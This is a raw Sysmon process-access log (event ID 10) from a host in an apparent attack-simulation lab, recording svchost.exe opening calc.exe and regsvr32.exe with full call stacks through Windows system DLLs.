10341000x8000000000000000360184Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360183Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360182Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360181Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360180Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360179Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360178Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360177Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360176Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a45-6013-2700-000000001100}162411036C:\Windows\System32\svchost.exe{8e433fbf-36df-6013-9f03-000000001100}10200C:\Windows\system32\regsvr32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+9c584|c:\windows\system32\themeservice.dll+1d60|c:\windows\system32\themeservice.dll+1595|c:\windows\system32\themeservice.dll+1461|c:\windows\system32\themeservice.dll+1886|C:\Windows\SYSTEM32\ntdll.dll+2f6d5|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360175Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360174Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a45-6013-2700-000000001100}16242136C:\Windows\System32\svchost.exe{8e433fbf-36df-6013-9f03-000000001100}10200C:\Windows\system32\regsvr32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+9c584|c:\windows\system32\themeservice.dll+1a9a|c:\windows\system32\themeservice.dll+1736|c:\windows\system32\themeservice.dll+6026|c:\windows\system32\themeservice.dll+ad9a|c:\windows\system32\themeservice.dll+9dcf|C:\Windows\System32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360173Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360172Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360171Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360170Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360169Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360168Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360167Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360166Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360165Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360164Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
10341000x8000000000000000360163Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360162Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.577{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd
